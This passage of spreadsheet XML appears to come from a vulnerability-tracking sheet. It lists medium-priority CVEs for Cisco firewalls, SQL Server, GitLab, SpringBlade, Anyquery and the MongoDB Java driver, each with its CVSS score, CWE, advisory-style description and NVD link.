          <t>A vulnerability in the TLS 1.3 implementation in Cisco Secure Firewall Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to cause an affected device to reload unexpectedly, resulting in a denial of service (DoS) condition.
This vulnerability is due to improper buffer management during the TLS 1.3 connection. An attacker could exploit this vulnerability by sending a crafted TLS 1.3 packet to an affected system through a TLS 1.3-enabled listening socket. A successful exploit could allow the attacker to cause the LINA process to crash, which would cause the device to reload. The reload can happen before or after authentication of the connection.Note:&amp;nbsp;TLS 1.3 connections include both data traffic and user-management traffic.</t>
        </is>
      </c>
      <c r="S70" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20135</t>
        </is>
      </c>
    </row>
    <row r="71">
      <c r="A71" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B71" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C71" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20154</t>
        </is>
      </c>
      <c r="D71" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E71" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F71" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G71" s="5" t="inlineStr"/>
      <c r="H71" s="5" t="inlineStr"/>
      <c r="I71" s="5" t="inlineStr"/>
      <c r="J71" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K71" s="5" t="inlineStr"/>
      <c r="L71" s="5" t="inlineStr"/>
      <c r="M71" s="5" t="inlineStr"/>
      <c r="N71" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O71" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P71" s="5" t="inlineStr"/>
      <c r="Q71" s="5" t="inlineStr">
        <is>
          <t>CWE-835</t>
        </is>
      </c>
      <c r="R71" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the system rate-limiting process for syslog message 419002 of Cisco Secure Firewall Adaptive Security Appliance (ASA) Software and Cisco Secure Firewall Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to cause high CPU utilization on an affected device, resulting in a denial of service (DoS) condition.
This vulnerability is due to improper rate limiting for syslog message 419002. An attacker could exploit this vulnerability by sending a flood of TCP synchronization (SYN) packets to an affected device. A successful exploit could allow the attacker to cause high CPU utilization, resulting in performance degradation.&amp;nbsp;</t>
        </is>
      </c>
      <c r="S71" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20154</t>
        </is>
      </c>
    </row>
    <row r="72">
      <c r="A72" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B72" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C72" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20249</t>
        </is>
      </c>
      <c r="D72" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E72" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F72" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G72" s="5" t="inlineStr"/>
      <c r="H72" s="5" t="inlineStr"/>
      <c r="I72" s="5" t="inlineStr"/>
      <c r="J72" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K72" s="5" t="inlineStr"/>
      <c r="L72" s="5" t="inlineStr"/>
      <c r="M72" s="5" t="inlineStr"/>
      <c r="N72" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O72" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P72" s="5" t="inlineStr"/>
      <c r="Q72" s="5" t="inlineStr">
        <is>
          <t>CWE-704</t>
        </is>
      </c>
      <c r="R72" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the certification authentication feature of Internet Key Exchange version 2 (IKEv2)&amp;nbsp;for Cisco Secure Firewall Adaptive Security Appliance (ASA) Software and Cisco Secure Firewall Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to cause an affected device to reload unexpectedly.
This vulnerability is due to a logic error during the certificate authentication phase of the IKEv2 connection setup. An attacker could exploit this vulnerability by attempting to establish an IKEv2 VPN connection with a crafted certificate. A successful exploit could allow the attacker to cause the IKEv2 process to crash, causing a denial of service (DoS) condition.</t>
        </is>
      </c>
      <c r="S72" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20249</t>
        </is>
      </c>
    </row>
    <row r="73">
      <c r="A73" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B73" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C73" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20250</t>
        </is>
      </c>
      <c r="D73" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E73" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F73" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G73" s="5" t="inlineStr"/>
      <c r="H73" s="5" t="inlineStr"/>
      <c r="I73" s="5" t="inlineStr"/>
      <c r="J73" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K73" s="5" t="inlineStr"/>
      <c r="L73" s="5" t="inlineStr"/>
      <c r="M73" s="5" t="inlineStr"/>
      <c r="N73" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O73" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P73" s="5" t="inlineStr"/>
      <c r="Q73" s="5" t="inlineStr">
        <is>
          <t>CWE-772</t>
        </is>
      </c>
      <c r="R73" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in Datagram TLS (DTLS) message handling of Cisco Secure Firewall Adaptive Security Appliance (ASA) Software and Cisco Secure Firewall Threat Defense (FTD) Software for Cisco Secure Firewall 3100 Series and 4200 Series devices could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device.
This vulnerability is due to improper resource management when processing certain DTLS messages. An attacker could exploit this vulnerability by sending a crafted stream of DTLS traffic to an affected device. A successful exploit could allow the attacker to cause the device to reload, resulting in a DoS condition.</t>
        </is>
      </c>
      <c r="S73" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20250</t>
        </is>
      </c>
    </row>
    <row r="74">
      <c r="A74" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B74" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C74" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20295</t>
        </is>
      </c>
      <c r="D74" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E74" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F74" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G74" s="5" t="inlineStr"/>
      <c r="H74" s="5" t="inlineStr"/>
      <c r="I74" s="5" t="inlineStr"/>
      <c r="J74" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K74" s="5" t="inlineStr"/>
      <c r="L74" s="5" t="inlineStr"/>
      <c r="M74" s="5" t="inlineStr"/>
      <c r="N74" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O74" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P74" s="5" t="inlineStr"/>
      <c r="Q74" s="5" t="inlineStr">
        <is>
          <t>CWE-789</t>
        </is>
      </c>
      <c r="R74" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the sftunnel inter-device communication protocol of Cisco Secure FMC Software and Cisco Secure FTD Software could allow an unauthenticated, remote attacker to exhaust the available memory of an affected device.
This vulnerability is due to improper management of memory resources during sftunnel TLS connection setup. An attacker could exploit this vulnerability by sending crafted sftunnel TLS frames to an affected device&amp;nbsp;during the connection setup. A successful exploit could allow the attacker to exhaust the available memory on the affected device, which could result in a DoS condition.</t>
        </is>
      </c>
      <c r="S74" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20295</t>
        </is>
      </c>
    </row>
    <row r="75">
      <c r="A75" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B75" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C75" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20352</t>
        </is>
      </c>
      <c r="D75" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E75" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F75" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G75" s="5" t="inlineStr"/>
      <c r="H75" s="5" t="inlineStr"/>
      <c r="I75" s="5" t="inlineStr"/>
      <c r="J75" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K75" s="5" t="inlineStr"/>
      <c r="L75" s="5" t="inlineStr"/>
      <c r="M75" s="5" t="inlineStr"/>
      <c r="N75" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O75" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P75" s="5" t="inlineStr"/>
      <c r="Q75" s="5" t="inlineStr">
        <is>
          <t>CWE-119</t>
        </is>
      </c>
      <c r="R75" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the RADIUS feature of Cisco Identity Services Engine (ISE) could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device.
This vulnerability is due to improper handling of certain RADIUS requests. An attacker could exploit this vulnerability by sending a crafted RADIUS request directly to an affected device. A successful exploit could allow the attacker to cause the ISE node to become unavailable. For single node deployments in that condition, endpoints that have not already authenticated would be unable to access the network until the&amp;nbsp;node comes back up on its own.</t>
        </is>
      </c>
      <c r="S75" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20352</t>
        </is>
      </c>
    </row>
    <row r="76">
      <c r="A76" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B76" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C76" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54628</t>
        </is>
      </c>
      <c r="D76" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E76" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F76" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G76" s="5" t="inlineStr"/>
      <c r="H76" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I76" s="5" t="inlineStr"/>
      <c r="J76" s="5" t="inlineStr">
        <is>
          <t>mysql</t>
        </is>
      </c>
      <c r="K76" s="5" t="inlineStr"/>
      <c r="L76" s="5" t="inlineStr"/>
      <c r="M76" s="5" t="inlineStr"/>
      <c r="N76" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O76" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P76" s="5" t="inlineStr"/>
      <c r="Q76" s="5" t="inlineStr">
        <is>
          <t>CWE-284, CWE-441, CWE-862, CWE-918</t>
        </is>
      </c>
      <c r="R76" s="5" t="inlineStr">
        <is>
          <t>Anyquery is an SQL query engine built on top of SQLite. Prior to 0.4.5, anyquery server exposes URL-capable SQLite virtual table modules such as json_reader and log_reader through its unauthenticated MySQL-compatible server port without restricting outbound destinations. A remote attacker can provide a loopback, private-network, or link-local cloud metadata URL, causing go-getter in the Anyquery server process to fetch the selected resource and expose its response as queryable table data. This permits internal network probing, access to internal APIs, and disclosure of cloud credentials; low-integrity impact is possible when a reached internal API performs state-changing actions. This issue is fixed in version 0.4.5.</t>
        </is>
      </c>
      <c r="S76" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54628</t>
        </is>
      </c>
    </row>
    <row r="77">
      <c r="A77" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B77" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C77" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56100</t>
        </is>
      </c>
      <c r="D77" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E77" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F77" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G77" s="5" t="inlineStr"/>
      <c r="H77" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I77" s="5" t="inlineStr"/>
      <c r="J77" s="5" t="inlineStr">
        <is>
          <t>spring</t>
        </is>
      </c>
      <c r="K77" s="5" t="inlineStr"/>
      <c r="L77" s="5" t="inlineStr"/>
      <c r="M77" s="5" t="inlineStr"/>
      <c r="N77" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O77" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P77" s="5" t="inlineStr"/>
      <c r="Q77" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R77" s="5" t="inlineStr">
        <is>
          <t>SpringBlade versions from 2.7.3 up to but not including 5.0.0 contain a privilege escalation vulnerability that allows authenticated attackers to create system administrator accounts by sending crafted POST requests to an unprotected internal Feign user-creation endpoint exposed via @RestController without authorization checks. Attackers can exploit the gateway's authentication filter, which only validates JWT parsing without verifying user roles or caller identity, and leverage a hardcoded JWT signing key embedded in publicly available JARs to forge tokens and escalate privileges from a low-privilege user to administrator, enabling cross-tenant data pollution and persistent backdoor access.</t>
        </is>
      </c>
      <c r="S77" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56100</t>
        </is>
      </c>
    </row>
    <row r="78">
      <c r="A78" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B78" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C78" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67378</t>
        </is>
      </c>
      <c r="D78" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E78" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F78" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G78" s="5" t="inlineStr"/>
      <c r="H78" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I78" s="5" t="inlineStr"/>
      <c r="J78" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K78" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L78" s="5" t="inlineStr"/>
      <c r="M78" s="5" t="inlineStr"/>
      <c r="N78" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O78" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P78" s="5" t="inlineStr"/>
      <c r="Q78" s="5" t="inlineStr">
        <is>
          <t>CWE-822</t>
        </is>
      </c>
      <c r="R78" s="5" t="inlineStr">
        <is>
          <t>Untrusted pointer dereference in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S78" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67378</t>
        </is>
      </c>
    </row>
    <row r="79">
      <c r="A79" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B79" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C79" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67379</t>
        </is>
      </c>
      <c r="D79" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E79" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F79" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G79" s="5" t="inlineStr"/>
      <c r="H79" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I79" s="5" t="inlineStr"/>
      <c r="J79" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K79" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L79" s="5" t="inlineStr"/>
      <c r="M79" s="5" t="inlineStr"/>
      <c r="N79" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O79" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P79" s="5" t="inlineStr"/>
      <c r="Q79" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="R79" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S79" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67379</t>
        </is>
      </c>
    </row>
    <row r="80">
      <c r="A80" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B80" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C80" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76412</t>
        </is>
      </c>
      <c r="D80" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E80" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F80" s="5" t="inlineStr">
        <is>
          <t>psirt@cisco.com</t>
        </is>
      </c>
      <c r="G80" s="5" t="inlineStr"/>
      <c r="H80" s="5" t="inlineStr"/>
      <c r="I80" s="5" t="inlineStr"/>
      <c r="J80" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K80" s="5" t="inlineStr"/>
      <c r="L80" s="5" t="inlineStr"/>
      <c r="M80" s="5" t="inlineStr"/>
      <c r="N80" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O80" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P80" s="5" t="inlineStr"/>
      <c r="Q80" s="5" t="inlineStr">
        <is>
          <t>CWE-264</t>
        </is>
      </c>
      <c r="R80" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the remote diagnostics debugger of Cisco Secure FMC Software could allow an authenticated, remote attacker to enable the remote diagnostics debugger service.
This vulnerability is due to an error when checking the privilege level of a user who is invoking remote diagnostics. An attacker could exploit this vulnerability by authenticating to the device, either through the web-based management interface or the REST API, and using the remote diagnostics debugger to grant a user elevated privileges. A successful exploit could allow the attacker to elevate privileges to root.
Notes:
To exploit this vulnerability, the attacker must have valid user credentials on the affected device.
The CVSSv3.1 Attack Complexity is High due to the multistage process required to fully exploit this vulnerability.</t>
        </is>
      </c>
      <c r="S80" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76412</t>
        </is>
      </c>
    </row>
    <row r="81">
      <c r="A81" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B81" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C81" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79708</t>
        </is>
      </c>
      <c r="D81" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E81" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F81" s="5" t="inlineStr">
        <is>
          <t>cve@gitlab.com</t>
        </is>
      </c>
      <c r="G81" s="5" t="inlineStr"/>
      <c r="H81" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I81" s="5" t="inlineStr"/>
      <c r="J81" s="5" t="inlineStr">
        <is>
          <t>gitlab</t>
        </is>
      </c>
      <c r="K81" s="5" t="inlineStr"/>
      <c r="L81" s="5" t="inlineStr"/>
      <c r="M81" s="5" t="inlineStr"/>
      <c r="N81" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O81" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P81" s="5" t="inlineStr"/>
      <c r="Q81" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R81" s="5" t="inlineStr">
        <is>
          <t>GitLab has remediated an issue in GitLab EE affecting all versions from 19.0 before 19.1.8, 19.2 before 19.2.6, and 19.3 before 19.3.2 that, under certain conditions could have allowed an authenticated user with developer permissions to execute a policy test pipeline on projects within their group and access protected CI/CD variables restricted to higher-privileged roles, due to insufficient scope validation.</t>
        </is>
      </c>
      <c r="S81" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79708</t>
        </is>
      </c>
    </row>
    <row r="82">
      <c r="A82" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B82" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C82" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20334</t>
        </is>
      </c>
      <c r="D82" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E82" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F82" s="5" t="inlineStr">
        <is>
          <t>psirt@cisco.com</t>
        </is>
      </c>
      <c r="G82" s="5" t="inlineStr"/>
      <c r="H82" s="5" t="inlineStr"/>
      <c r="I82" s="5" t="inlineStr"/>
      <c r="J82" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K82" s="5" t="inlineStr"/>
      <c r="L82" s="5" t="inlineStr"/>
      <c r="M82" s="5" t="inlineStr"/>
      <c r="N82" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O82" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P82" s="5" t="inlineStr"/>
      <c r="Q82" s="5" t="inlineStr">
        <is>
          <t>CWE-710</t>
        </is>
      </c>
      <c r="R82" s="5" t="inlineStr">
        <is>
          <t>As part of Cisco's ongoing commitment to proactive security and product quality, the Cisco Secure Adaptive Security Appliance Software, Cisco Secure Firewall Threat Defense Software and Cisco Secure Firewall Management Center Software engineering team has conducted a comprehensive internal security review. This review resulted in a software hardening release that addresses multiple internally discovered vulnerabilities.
The vulnerabilities tracked by CVE-2026-20334 are related to issues concerning improper adherence to coding standards that are grouped under the Common Weakness Enumeration (CWE) Pillar CWE-710.</t>
        </is>
      </c>
      <c r="S82" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20334</t>
        </is>
      </c>
    </row>
    <row r="83">
      <c r="A83" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B83" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C83" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20323</t>
        </is>
      </c>
      <c r="D83" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E83" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F83" s="5" t="inlineStr">
        <is>
          <t>psirt@cisco.com</t>
        </is>
      </c>
      <c r="G83" s="5" t="inlineStr"/>
      <c r="H83" s="5" t="inlineStr"/>
      <c r="I83" s="5" t="inlineStr"/>
      <c r="J83" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K83" s="5" t="inlineStr"/>
      <c r="L83" s="5" t="inlineStr"/>
      <c r="M83" s="5" t="inlineStr"/>
      <c r="N83" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O83" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P83" s="5" t="inlineStr"/>
      <c r="Q83" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="R83" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the sftunnel inter-device communication protocol of Cisco Secure FMC Software and Cisco Secure FTD Software could allow an unauthenticated, adjacent attacker to impersonate the peer device and obtain access at the level of the&amp;nbsp;manager role, which is equivalent to root.
This vulnerability is due to improper management of the TLS certificate for the sftunnel management connection. An attacker could exploit this vulnerability by connecting to the sftunnel port using a crafted TLS certificate. A successful exploit could allow the attacker to become a registered sftunnel peer with root access.
Note: The attack is successful only if the sftunnel connection is down or the attack can disrupt the sftunnel connection long enough to execute the attack.</t>
        </is>
      </c>
      <c r="S83" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20323</t>
        </is>
      </c>
    </row>
    <row r="84">
      <c r="A84" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B84" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C84" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88033</t>
        </is>
      </c>
      <c r="D84" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E84" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F84" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G84" s="5" t="inlineStr"/>
      <c r="H84" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I84" s="5" t="inlineStr"/>
      <c r="J84" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K84" s="5" t="inlineStr">
        <is>
          <t>mongodb:java_driver</t>
        </is>
      </c>
      <c r="L84" s="5" t="inlineStr"/>
      <c r="M84" s="5" t="inlineStr"/>
      <c r="N84" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O84" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="P84" s="5" t="inlineStr"/>
      <c r="Q84" s="5" t="inlineStr">
        <is>
          <t>CWE-943</t>
        </is>
      </c>
      <c r="R84" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements in data query logic in the GridFS component of the MongoDB Java Driver can cause a caller-supplied structured file identifier to be interpreted as a query condition rather than as a literal identifier. An authenticated user who can influence the identifier passed by an affected application may obtain stored file content beyond the intended target or cause all GridFS file chunks in the affected bucket to be removed, rendering stored file content unreadable. The affected rename operation may also rename a stored file other than the intended target.</t>
        </is>
      </c>
      <c r="S84" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88033</t>
        </is>
      </c>
    </row>
    <row r="85">
      <c r="A85" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B85" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C85" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76413</t>
        </is>
      </c>
      <c r="D85" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E85" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F85" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G85" s="5" t="inlineStr"/>
      <c r="H85" s="5" t="inlineStr"/>
      <c r="I85" s="5" t="inlineStr"/>
      <c r="J85" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K85" s="5" t="inlineStr"/>
      <c r="L85" s="5" t="inlineStr"/>
      <c r="M85" s="5" t="inlineStr"/>
      <c r="N85" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O85" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P85" s="5" t="inlineStr"/>
      <c r="Q85" s="5" t="inlineStr">
        <is>
          <t>CWE-1259</t>
        </is>
      </c>
      <c r="R85" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in Cisco Adaptive Security Device Manager (ASDM) single sign-on (SSO) handler for Cisco Secure FMC Software could allow an unauthenticated, remote attacker to log in as the Cisco ASDM administrator user.
This vulnerability is due to improper management of the Cisco ASDM SSO token. An attacker could exploit this vulnerability by performing session token forgery techniques. A successful exploit could allow the attacker to log in as the administrator user and, by repeating this action, keep legitimate administrators locked out of the ASDM indefinitely.</t>
        </is>
      </c>
      <c r="S85" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76413</t>
        </is>
      </c>
    </row>
